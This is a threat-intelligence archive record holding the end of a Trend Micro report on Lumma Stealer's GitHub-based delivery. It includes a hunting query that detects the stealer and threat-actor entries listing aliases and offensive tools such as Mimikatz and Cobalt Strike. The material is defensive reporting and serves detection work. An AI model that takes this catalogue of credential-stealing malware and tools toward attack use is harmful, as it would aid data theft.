surface,\r\nand providing complete visibility into its cyber risk posture. 
The cloud-based platform leverages AI and threat intelligence\r\nfrom 250 million sensors and 16 threat research centers around the globe to provide comprehensive risk insights, earlier\r\nthreat detection, and automated risk and threat response options in a single solution.\r\nTrend Vision One Threat Intelligence\r\nTo stay ahead of evolving threats, Trend Vision One customers can access a range of Intelligence Reports and Threat\r\nInsights within Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and allows them\r\nto prepare for emerging threats by offering comprehensive information on threat actors, their malicious activities, and their\r\ntechniques. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks,\r\nand effectively respond to threats.\r\nLumma Stealer's GitHub-Based Delivery Explored via Managed Detection and Response\r\nEmerging Threats: Lumma Stealer’s GitHub-Based Delivery Explored via Managed Detection and Response\r\nThreat Actor: Water Kurita\r\nHunting queries\r\nTrend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post\r\nusing data within their environment.\r\nmalName:*LUMMASTEALER* AND eventName:MALWARE_DETECTION AND LogType: detection\r\nMore hunting queries are available for Vision One customers with Threat Insights Entitlement enabled.\r\nConclusion\r\nThe distribution method of Lumma Stealer continues to evolve, with the threat actor now using GitHub repositories to host\r\nmalware. 
The Malware-as-a-Service (MaaS) model provides malicious actors with a cost-effective and accessible means to\r\nexecute complex cyberattacks and achieve their malicious objectives, easing the distribution of threats such as Lumma\r\nStealer.\r\nThe delivery of multiple threats such as SectopRAT, Vidar, and Cobeacon suggests that its perpetrators are taking a modular\r\napproach to their attacks. Future Lumma Stealer variants could include dynamically downloaded modules, enabling\r\nmalicious actors to tailor payloads based on the victim’s system or industry. This could lead to more targeted attacks or even\r\nthe introduction of new capabilities, such as ransomware, espionage, or cryptocurrency mining.\r\nThe campaign discussed in this blog entry aligns closely with tactics attributed to the Stargazer Goblin group, possibly\r\nindicating their involvement, despite some variations in infection chain order, URL structures, and the use of multiple\r\npayloads.\r\nThe role of Managed XDR in uncovering tactics, techniques, and procedures, as demonstrated in this recent incident\r\ninvestigation, highlights its critical importance for organizations. By investigating files downloaded from apparently\r\nlegitimate sources like GitHub, the Managed XDR team was able to identify this threat and protect customers. This allowed\r\nthe team to take swift action on affected machines to prevent further damage. Additionally, the integration of cyber threat\r\nintelligence proved invaluable, as attributing the threat to the group Stargazer Goblin enabled the team to understand the\r\nmalicious actor’s methods and anticipate other potential attacks.\r\nManaged XDR employs expert analytics to process extensive data gathered from various Trend technologies. 
By using\r\nadvanced AI and security analytics, it can correlate information from customer environments and global threat intelligence,\r\nproducing more precise alerts and enabling faster threat detection.\r\nIndicators of Compromise\r\nThe indicators of compromise for this entry can be found here.\r\nSource: https://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html"
	],
	"report_names": [
		"lumma-stealers-github-based-delivery-via-mdr.html"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5be99bea-0f77-492b-be61-e7cc225bbff4",
			"created_at": "2026-03-08T02:00:03.473966Z",
			"updated_at": "2026-04-10T02:00:03.983164Z",
			"deleted_at": null,
			"main_name": "Water Kurita",
			"aliases": [],
			"source_name": "MISPGALAXY:Water Kurita",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e8dd54ac-a3fa-4496-8b17-a9360ad13927",
			"created_at": "2024-07-28T02:00:04.686094Z",
			"updated_at": "2026-04-10T02:00:03.680897Z",
			"deleted_at": null,
			"main_name": "Stargazer Goblin",
			"aliases": [],
			"source_name": "MISPGALAXY:Stargazer Goblin",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434388,
	"ts_updated_at": 1775792207,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0d645c4d3da53df7d1923854d03d98668c82db59.pdf",
		"text": "https://archive.orkl.eu/0d645c4d3da53df7d1923854d03d98668c82db59.txt",
		"img": "https://archive.orkl.eu/0d645c4d3da53df7d1923854d03d98668c82db59.jpg"
	}
}